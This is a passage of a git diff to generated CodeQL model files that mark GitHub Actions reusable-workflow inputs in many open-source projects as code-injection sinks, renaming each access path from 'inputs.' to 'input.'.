diff --git a/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml b/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml index 24603c25a77..40549844d38 100644 --- a/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["shaka-project/shaka-player/.github/workflows/selenium-lab-tests.yaml", "*", "inputs.ignore_test_status", "code-injection", "generated"] - - ["shaka-project/shaka-player/.github/workflows/selenium-lab-tests.yaml", "*", "inputs.test_filter", "code-injection", "generated"] - - ["shaka-project/shaka-player/.github/workflows/selenium-lab-tests.yaml", "*", "inputs.browser_filter", "code-injection", "generated"] - - ["shaka-project/shaka-player/.github/workflows/selenium-lab-tests.yaml", "*", "inputs.pr", "code-injection", "generated"] \ No newline at end of file + - ["shaka-project/shaka-player/.github/workflows/selenium-lab-tests.yaml", "*", "input.ignore_test_status", "code-injection", "generated"] + - ["shaka-project/shaka-player/.github/workflows/selenium-lab-tests.yaml", "*", "input.test_filter", "code-injection", "generated"] + - ["shaka-project/shaka-player/.github/workflows/selenium-lab-tests.yaml", "*", "input.browser_filter", "code-injection", "generated"] + - ["shaka-project/shaka-player/.github/workflows/selenium-lab-tests.yaml", "*", "input.pr", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml b/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml index 29f01c24bed..bd180d9b367 100644 --- a/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml 
@@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["shimataro/ssh-key-action/.github/workflows/reusable-verify.yml", "*", "inputs.package_installation_command", "code-injection", "generated"] \ No newline at end of file + - ["shimataro/ssh-key-action/.github/workflows/reusable-verify.yml", "*", "input.package_installation_command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml b/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml index acad489dbe5..1e5721f1e7c 100644 --- a/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["softfever/orcaslicer/.github/workflows/build_orca.yml", "*", "inputs.arch", "code-injection", "generated"] - - ["softfever/orcaslicer/.github/workflows/build_deps.yml", "*", "inputs.arch", "code-injection", "generated"] \ No newline at end of file + - ["softfever/orcaslicer/.github/workflows/build_orca.yml", "*", "input.arch", "code-injection", "generated"] + - ["softfever/orcaslicer/.github/workflows/build_deps.yml", "*", "input.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml b/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml index e15b6d33042..b7a14240aed 100644 --- a/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml 
@@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["software-mansion/react-native-reanimated/.github/workflows/build-npm-package-action.yml", "*", "inputs.option", "code-injection", "generated"] \ No newline at end of file + - ["software-mansion/react-native-reanimated/.github/workflows/build-npm-package-action.yml", "*", "input.option", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml b/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml index 12c9f97b7a4..1a276f8812f 100644 --- a/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["solana-labs/solana/.github/workflows/release-artifacts.yml", "*", "inputs.commit", "code-injection", "generated"] \ No newline at end of file + - ["solana-labs/solana/.github/workflows/release-artifacts.yml", "*", "input.commit", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml b/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml index 685944420aa..ef448c8f4c0 100644 --- a/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml 
@@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["sonarr/sonarr/.github/workflows/deploy.yml", "*", "inputs.version", "code-injection", "generated"] - - ["sonarr/sonarr/.github/workflows/deploy.yml", "*", "inputs.branch", "code-injection", "generated"] \ No newline at end of file + - ["sonarr/sonarr/.github/workflows/deploy.yml", "*", "input.version", "code-injection", "generated"] + - ["sonarr/sonarr/.github/workflows/deploy.yml", "*", "input.branch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml b/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml index 884c3d154ad..6c672170025 100644 --- a/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["speedb-io/speedb/.github/workflows/build_ubuntu_arm.yml", "*", "inputs.verSion", "code-injection", "generated"] - - ["speedb-io/speedb/.github/workflows/build_macos_ARM.yml", "*", "inputs.verSion", "code-injection", "generated"] \ No newline at end of file + - ["speedb-io/speedb/.github/workflows/build_ubuntu_arm.yml", "*", "input.verSion", "code-injection", "generated"] + - ["speedb-io/speedb/.github/workflows/build_macos_ARM.yml", "*", "input.verSion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml b/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml index 799958a7fee..b7104a8b615 100644 --- a/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml 
@@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["spring-cloud/spring-cloud-dataflow/.github/workflows/build-images.yml", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file + - ["spring-cloud/spring-cloud-dataflow/.github/workflows/build-images.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml b/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml index 32d3e59e1f8..cd81a723906 100644 --- a/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["sqlfluff/sqlfluff/.github/workflows/ci-test-python.yml", "*", "inputs.marks", "code-injection", "generated"] - - ["sqlfluff/sqlfluff/.github/workflows/ci-test-python.yml", "*", "inputs.python-version", "code-injection", "generated"] - - ["sqlfluff/sqlfluff/.github/workflows/ci-test-dbt.yml", "*", "inputs.dbt-version", "code-injection", "generated"] \ No newline at end of file + - ["sqlfluff/sqlfluff/.github/workflows/ci-test-python.yml", "*", "input.marks", "code-injection", "generated"] + - ["sqlfluff/sqlfluff/.github/workflows/ci-test-python.yml", "*", "input.python-version", "code-injection", "generated"] + - ["sqlfluff/sqlfluff/.github/workflows/ci-test-dbt.yml", "*", "input.dbt-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml b/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml index f2893eb2407..1b2ce37480f 100644 --- a/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml 
@@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["stdlib-js/stdlib/.github/workflows/update_pr_copyright_years.yml", "*", "inputs.pull_request_number", "code-injection", "generated"] - - ["stdlib-js/stdlib/.github/workflows/lint_autofix.yml", "*", "inputs.pull_request_number", "code-injection", "generated"] - - ["stdlib-js/stdlib/.github/workflows/check_required_files.yml", "*", "inputs.user", "code-injection", "generated"] - - ["stdlib-js/stdlib/.github/workflows/check_required_files.yml", "*", "inputs.pull_request_number", "code-injection", "generated"] \ No newline at end of file + - ["stdlib-js/stdlib/.github/workflows/update_pr_copyright_years.yml", "*", "input.pull_request_number", "code-injection", "generated"] + - ["stdlib-js/stdlib/.github/workflows/lint_autofix.yml", "*", "input.pull_request_number", "code-injection", "generated"] + - ["stdlib-js/stdlib/.github/workflows/check_required_files.yml", "*", "input.user", "code-injection", "generated"] + - ["stdlib-js/stdlib/.github/workflows/check_required_files.yml", "*", "input.pull_request_number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml b/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml index ea3b2029f82..91889927c45 100644 --- a/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml 
@@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["stereokit/stereokit/.github/workflows/build.yml", "*", "inputs.patch", "code-injection", "generated"] - - ["stereokit/stereokit/.github/workflows/build.yml", "*", "inputs.minor", "code-injection", "generated"] - - ["stereokit/stereokit/.github/workflows/build.yml", "*", "inputs.major", "code-injection", "generated"] - - ["stereokit/stereokit/.github/workflows/build.yml", "*", "inputs.preName", "code-injection", "generated"] - - ["stereokit/stereokit/.github/workflows/build.yml", "*", "inputs.pre", "code-injection", "generated"] \ No newline at end of file + - ["stereokit/stereokit/.github/workflows/build.yml", "*", "input.patch", "code-injection", "generated"] + - ["stereokit/stereokit/.github/workflows/build.yml", "*", "input.minor", "code-injection", "generated"] + - ["stereokit/stereokit/.github/workflows/build.yml", "*", "input.major", "code-injection", "generated"] + - ["stereokit/stereokit/.github/workflows/build.yml", "*", "input.preName", "code-injection", "generated"] + - ["stereokit/stereokit/.github/workflows/build.yml", "*", "input.pre", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml b/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml index 0c542713430..8d4400bd3ea 100644 --- a/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml 
@@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["streetsidesoftware/cspell/.github/workflows/reuseable-pr-from-artifact.yml", "*", "inputs.patch_path", "code-injection", "generated"] + - ["streetsidesoftware/cspell/.github/workflows/reuseable-pr-from-artifact.yml", "*", "input.patch_path", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all extensible: summaryModel diff --git a/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml b/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml index 4c0442abd2b..29c7e1bd3e2 100644 --- a/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["supabase/auth/.github/workflows/publish.yml", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file + - ["supabase/auth/.github/workflows/publish.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml b/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml index 39c81d39066..109dce9df0d 100644 --- a/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["supabase/cli/.github/workflows/mirror-image.yml", "*", "inputs.image", "code-injection", "generated"] \ No newline at end of file + - ["supabase/cli/.github/workflows/mirror-image.yml", "*", "input.image", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml b/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml index b5d1263f743..e3643f0156b 100644 
--- a/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml @@ -3,10 +3,10 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["tencent/hippy/.github/workflows/reuse_get_workflow_output.yml", "*", "inputs.workflow_run", "code-injection", "generated"] - - ["tencent/hippy/.github/workflows/reuse_classify_commits.yml", "*", "inputs.pull_request_number", "code-injection", "generated"] - - ["tencent/hippy/.github/workflows/reuse_approve_checks_run.yml", "*", "inputs.pull_request_head_sha", "code-injection", "generated"] - - ["tencent/hippy/.github/workflows/reuse_approve_checks_run.yml", "*", "inputs.pull_request_number", "code-injection", "generated"] + - ["tencent/hippy/.github/workflows/reuse_get_workflow_output.yml", "*", "input.workflow_run", "code-injection", "generated"] + - ["tencent/hippy/.github/workflows/reuse_classify_commits.yml", "*", "input.pull_request_number", "code-injection", "generated"] + - ["tencent/hippy/.github/workflows/reuse_approve_checks_run.yml", "*", "input.pull_request_head_sha", "code-injection", "generated"] + - ["tencent/hippy/.github/workflows/reuse_approve_checks_run.yml", "*", "input.pull_request_number", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all extensible: summaryModel diff --git a/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml b/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml index ffb08a8fa2e..a4bba59b5a5 100644 --- a/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml 
@@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["tgstation/tgstation/.github/workflows/run_integration_tests.yml", "*", "inputs.map", "code-injection", "generated"] - - ["tgstation/tgstation/.github/workflows/run_integration_tests.yml", "*", "inputs.minor", "code-injection", "generated"] - - ["tgstation/tgstation/.github/workflows/run_integration_tests.yml", "*", "inputs.major", "code-injection", "generated"] \ No newline at end of file + - ["tgstation/tgstation/.github/workflows/run_integration_tests.yml", "*", "input.map", "code-injection", "generated"] + - ["tgstation/tgstation/.github/workflows/run_integration_tests.yml", "*", "input.minor", "code-injection", "generated"] + - ["tgstation/tgstation/.github/workflows/run_integration_tests.yml", "*", "input.major", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml b/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml index 4012908e7e9..d12982c35a4 100644 --- a/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["thesofproject/sof/.github/workflows/ipc_fuzzer.yml", "*", "inputs.fuzzing_duration_s", "code-injection", "generated"] \ No newline at end of file + - ["thesofproject/sof/.github/workflows/ipc_fuzzer.yml", "*", "input.fuzzing_duration_s", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml b/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml index a1af8280ebc..deb10e5e4b4 100644 --- a/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml 
@@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["tiann/kernelsu/.github/workflows/ksud.yml", "*", "inputs.target", "code-injection", "generated"] - - ["tiann/kernelsu/.github/workflows/avd-kernel.yml", "*", "inputs.manifest_name", "code-injection", "generated"] - - ["tiann/kernelsu/.github/workflows/wsa-kernel.yml", "*", "inputs.arch", "code-injection", "generated"] \ No newline at end of file + - ["tiann/kernelsu/.github/workflows/ksud.yml", "*", "input.target", "code-injection", "generated"] + - ["tiann/kernelsu/.github/workflows/avd-kernel.yml", "*", "input.manifest_name", "code-injection", "generated"] + - ["tiann/kernelsu/.github/workflows/wsa-kernel.yml", "*", "input.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml b/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml index 84de5681fea..5c22f0ffcb7 100644 --- a/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["tiledb-inc/tiledb/.github/workflows/ci-linux_mac.yml", "*", "inputs.asan", "code-injection", "generated"] - - ["tiledb-inc/tiledb/.github/workflows/append-release-cmake.yml", "*", "inputs.ref", "code-injection", "generated"] \ No newline at end of file + - ["tiledb-inc/tiledb/.github/workflows/ci-linux_mac.yml", "*", "input.asan", "code-injection", "generated"] + - ["tiledb-inc/tiledb/.github/workflows/append-release-cmake.yml", "*", "input.ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml b/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml index c9e8b5c23c0..790e94c2aac 100644 
--- a/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["toeverything/affine/.github/workflows/build-server-image.yml", "*", "inputs.flavor", "code-injection", "generated"] \ No newline at end of file + - ["toeverything/affine/.github/workflows/build-server-image.yml", "*", "input.flavor", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml b/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml index 80dde7f2fc0..fedb21393bc 100644 --- a/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["tracel-ai/burn/.github/workflows/publish-template.yml", "*", "inputs.crate", "code-injection", "generated"] \ No newline at end of file + - ["tracel-ai/burn/.github/workflows/publish-template.yml", "*", "input.crate", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml b/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml index 1ffaa4e1cd0..f60fffb206e 100644 --- a/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["tribler/tribler/.github/workflows/pytest_custom_ipv8.yml", "*", "inputs.ipv8-git-ref", "code-injection", "generated"] \ No newline at end of file + - ["tribler/tribler/.github/workflows/pytest_custom_ipv8.yml", "*", "input.ipv8-git-ref", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml b/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml index 48b35d83c70..c7fe932aba2 100644 --- a/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["ubisoft/sharpmake/.github/workflows/build.yml", "*", "inputs.framework", "code-injection", "generated"] - - ["ubisoft/sharpmake/.github/workflows/build.yml", "*", "inputs.configuration", "code-injection", "generated"] \ No newline at end of file + - ["ubisoft/sharpmake/.github/workflows/build.yml", "*", "input.framework", "code-injection", "generated"] + - ["ubisoft/sharpmake/.github/workflows/build.yml", "*", "input.configuration", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml b/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml index e1a0c8a9fcf..d47aea3363f 100644 --- a/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["unity-technologies/ml-agents/.github/workflows/pytest.yml", "*", "inputs.pytest_markers", "code-injection", "generated"] \ No newline at end of file + - ["unity-technologies/ml-agents/.github/workflows/pytest.yml", "*", "input.pytest_markers", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml b/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml index 71cd3fed3ed..f32acf5038e 100644 --- a/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml 
+++ b/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["urbit/urbit/.github/workflows/shared.yml", "*", "inputs.pace", "code-injection", "generated"] - - ["urbit/urbit/.github/workflows/shared.yml", "*", "inputs.next", "code-injection", "generated"] \ No newline at end of file + - ["urbit/urbit/.github/workflows/shared.yml", "*", "input.pace", "code-injection", "generated"] + - ["urbit/urbit/.github/workflows/shared.yml", "*", "input.next", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml b/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml index 47f53f495f8..c739b5750cc 100644 --- a/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["uyuni-project/uyuni/.github/workflows/acceptance_tests_common.yml", "*", "inputs.server_id", "code-injection", "generated"] - - ["uyuni-project/uyuni/.github/workflows/acceptance_tests_common.yml", "*", "inputs.secondary_tests", "code-injection", "generated"] \ No newline at end of file + - ["uyuni-project/uyuni/.github/workflows/acceptance_tests_common.yml", "*", "input.server_id", "code-injection", "generated"] + - ["uyuni-project/uyuni/.github/workflows/acceptance_tests_common.yml", "*", "input.secondary_tests", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml b/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml index 1b592aa91cc..7ac3c0fb530 100644 --- a/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml 
@@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["vert-x3/vertx-hazelcast/.github/workflows/it.yml", "*", "inputs.hz", "code-injection", "generated"] - - ["vert-x3/vertx-hazelcast/.github/workflows/ci.yml", "*", "inputs.hz", "code-injection", "generated"] \ No newline at end of file + - ["vert-x3/vertx-hazelcast/.github/workflows/it.yml", "*", "input.hz", "code-injection", "generated"] + - ["vert-x3/vertx-hazelcast/.github/workflows/ci.yml", "*", "input.hz", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml b/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml index db4e957a87a..c641035f966 100644 --- a/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["vkcom/vkui/.github/workflows/reusable_workflow_test.yml", "*", "inputs.workspace", "code-injection", "generated"] \ No newline at end of file + - ["vkcom/vkui/.github/workflows/reusable_workflow_test.yml", "*", "input.workspace", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml b/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml index c3642c84f63..adea8ae4bd2 100644 --- a/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml 
@@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["walletconnect/web3modal/.github/workflows/ui_tests.yml", "*", "inputs.command", "code-injection", "generated"] \ No newline at end of file + - ["walletconnect/web3modal/.github/workflows/ui_tests.yml", "*", "input.command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml b/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml index 3e6691f0e8f..857c946e2b7 100644 --- a/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["warzone2100/warzone2100/.github/workflows/publish_web_build.yml", "*", "inputs.architecture", "code-injection", "generated"] \ No newline at end of file + - ["warzone2100/warzone2100/.github/workflows/publish_web_build.yml", "*", "input.architecture", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml b/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml index 733c2e20a71..717022ea6e8 100644 --- a/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml 
@@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["wasmedge/wasmedge/.github/workflows/reusable-create-source-tarball.yml", "*", "inputs.version", "code-injection", "generated"] - - ["wasmedge/wasmedge/.github/workflows/reusable-build-on-windows.yml", "*", "inputs.version", "code-injection", "generated"] - - ["wasmedge/wasmedge/.github/workflows/reusable-build-on-windows-msvc.yml", "*", "inputs.version", "code-injection", "generated"] - - ["wasmedge/wasmedge/.github/workflows/reusable-build-on-ubuntu.yml", "*", "inputs.version", "code-injection", "generated"] - - ["wasmedge/wasmedge/.github/workflows/reusable-build-on-manylinux.yml", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file + - ["wasmedge/wasmedge/.github/workflows/reusable-create-source-tarball.yml", "*", "input.version", "code-injection", "generated"] + - ["wasmedge/wasmedge/.github/workflows/reusable-build-on-windows.yml", "*", "input.version", "code-injection", "generated"] + - ["wasmedge/wasmedge/.github/workflows/reusable-build-on-windows-msvc.yml", "*", "input.version", "code-injection", "generated"] + - ["wasmedge/wasmedge/.github/workflows/reusable-build-on-ubuntu.yml", "*", "input.version", "code-injection", "generated"] + - ["wasmedge/wasmedge/.github/workflows/reusable-build-on-manylinux.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml b/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml index cb80f74e4e8..7dadb99209d 100644 --- a/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml 
